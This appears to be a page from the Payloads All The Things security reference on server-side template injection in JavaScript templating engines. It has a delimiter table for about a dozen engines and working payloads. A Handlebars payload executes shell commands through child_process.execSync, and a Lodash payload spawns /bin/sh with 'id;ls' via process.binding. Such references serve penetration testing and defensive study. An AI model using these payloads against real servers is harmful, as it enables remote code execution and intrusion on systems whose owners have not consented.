Skip to content

Payloads All The Things

Server Side Template Injection - JavaScript

Payloads All The Things

Payloads All The Things
CONTRIBUTING
API Key Leaks
API Key Leaks
- API Key and Token Leaks
- IIS Machine Keys
Account Takeover
Account Takeover
- Account Takeover
- MFA Bypasses
Business Logic Errors
Business Logic Errors
- Business Logic Errors
CORS Misconfiguration
CORS Misconfiguration
- CORS Misconfiguration
CRLF Injection
CRLF Injection
- Carriage Return Line Feed
CSV Injection
CSV Injection
- CSV Injection
CVE Exploits
CVE Exploits
- Common Vulnerabilities and Exposures
- CVE-2021-44228 Log4Shell
Clickjacking
Clickjacking
- Clickjacking
Client Side Path Traversal
Client Side Path Traversal
- Client Side Path Traversal
Command Injection
Command Injection
- Command Injection
Cross Site Request Forgery
Cross Site Request Forgery
- Cross-Site Request Forgery
DNS Rebinding
DNS Rebinding
- DNS Rebinding
DOM Clobbering
DOM Clobbering
- DOM Clobbering
Denial of Service
Denial of Service
- Denial of Service
Dependency Confusion
Dependency Confusion
- Dependency Confusion
Directory Traversal
Directory Traversal
- Directory Traversal
File Inclusion
File Inclusion
- File Inclusion
Google Web Toolkit
Google Web Toolkit
- Google Web Toolkit
GraphQL Injection
GraphQL Injection
- GraphQL Injection
HTTP Parameter Pollution
HTTP Parameter Pollution
- HTTP Parameter Pollution
Headless Browser
Headless Browser
- Headless Browser
Hidden Parameters
Hidden Parameters
- HTTP Hidden Parameters
Insecure Deserialization
Insecure Deserialization
Insecure Direct Object References
Insecure Direct Object References
- Insecure Direct Object References
Insecure Management Interface
Insecure Management Interface
- Insecure Management Interface
Insecure Randomness
Insecure Randomness
- Insecure Randomness
Insecure Source Code Management
Insecure Source Code Management
JSON Web Token
JSON Web Token
- JWT - JSON Web Token
Java RMI
Java RMI
- Java RMI
LDAP Injection
LDAP Injection
- LDAP Injection
LaTeX Injection
LaTeX Injection
- LaTeX Injection
Mass Assignment
Mass Assignment
- Mass Assignment
Methodology and Resources
Methodology and Resources
NoSQL Injection
NoSQL Injection
- NoSQL Injection
OAuth Misconfiguration
OAuth Misconfiguration
- OAuth Misconfiguration
ORM Leak
ORM Leak
- ORM Leak
Open Redirect
Open Redirect
- Open URL Redirection
Prompt Injection
Prompt Injection
- Prompt Injection
Prototype Pollution
Prototype Pollution
- Prototype Pollution
Race Condition
Race Condition
- Race Condition
Regular Expression
Regular Expression
- Regular Expression
Request Smuggling
Request Smuggling
- Request Smuggling
SAML Injection
SAML Injection
- SAML Injection
SQL Injection
SQL Injection
Server Side Include Injection
Server Side Include Injection
- Server Side Include Injection
Server Side Request Forgery
Server Side Request Forgery
- Server-Side Request Forgery
Server Side Template Injection
Server Side Template Injection
- Server Side Template Injection
- Server Side Template Injection - ASP.NET
- Server Side Template Injection - Expression Language
- Server Side Template Injection - Java
- Server Side Template Injection - JavaScript Server Side Template Injection - JavaScript
  Table of contents
- Server Side Template Injection - PHP
- Server Side Template Injection - Python
- Server Side Template Injection - Ruby
Tabnabbing
Tabnabbing
- Tabnabbing
Type Juggling
Type Juggling
- Type Juggling
Upload Insecure Files
Upload Insecure Files
- Upload Insecure Files
- Configuration Apache .htaccess
  Configuration Apache .htaccess
  - .htaccess
Web Cache Deception
Web Cache Deception
- Web Cache Deception
Web Sockets
Web Sockets
- Web Sockets
XPATH Injection
XPATH Injection
- XPATH Injection
XSLT Injection
XSLT Injection
- XSLT Injection
XSS Injection
XSS Injection
XXE Injection
XXE Injection
- XML External Entity
Zip Slip
Zip Slip
- Zip Slip
LEARNING AND SOCIALS
LEARNING AND SOCIALS
- Books
- Twitter
- Youtube
template vuln
template vuln
- Vulnerability Title

Server Side Template Injection - JavaScript

Server-Side Template Injection (SSTI) occurs when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In the context of JavaScript, SSTI vulnerabilities can arise when using server-side templating engines like Handlebars, EJS, or Pug, where user input is integrated into templates without adequate sanitization.

Summary

Templating Libraries
Handlebars
- Handlebars - Command Execution
Lodash
- Lodash - Basic Injection
- Lodash - Command Execution
References

Templating Libraries

Template Name	Payload Format
DotJS	`{{= }}`
DustJS	`{}`
EJS	`<% %>`
HandlebarsJS	`{{ }}`
HoganJS	`{{ }}`
Lodash	`{{= }}`
MustacheJS	`{{ }}`
NunjucksJS	`{{ }}`
PugJS	`#{}`
TwigJS	`{{ }}`
UnderscoreJS	`<% %>`
VelocityJS	`#=set($X="")$X`
VueJS	`{{ }}`

Handlebars

Official website

Handlebars compiles templates into JavaScript functions.

Handlebars - Command Execution

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('ls -la');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

Lodash

Official website

Lodash - Basic Injection

How to create a template:

const _ = require('lodash');
string = "{{= username}}"
const options = {
  evaluate: /\{\{(.+?)\}\}/g,
  interpolate: /\{\{=(.+?)\}\}/g,
  escape: /\{\{-(.+?)\}\}/g,
};

_.template(string, options);

string: The template string.
options.interpolate: It is a regular expression that specifies the HTML interpolate delimiter.
options.evaluate: It is a regular expression that specifies the HTML evaluate delimiter.
options.escape: It is a regular expression that specifies the HTML escape delimiter.

For the purpose of RCE, the delimiter of templates is determined by the options.evaluate parameter.

{{= _.VERSION}}
${= _.VERSION}
<%= _.VERSION %>


{{= _.templateSettings.evaluate }}
${= _.VERSION}
<%= _.VERSION %>

Lodash - Command Execution

{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}

References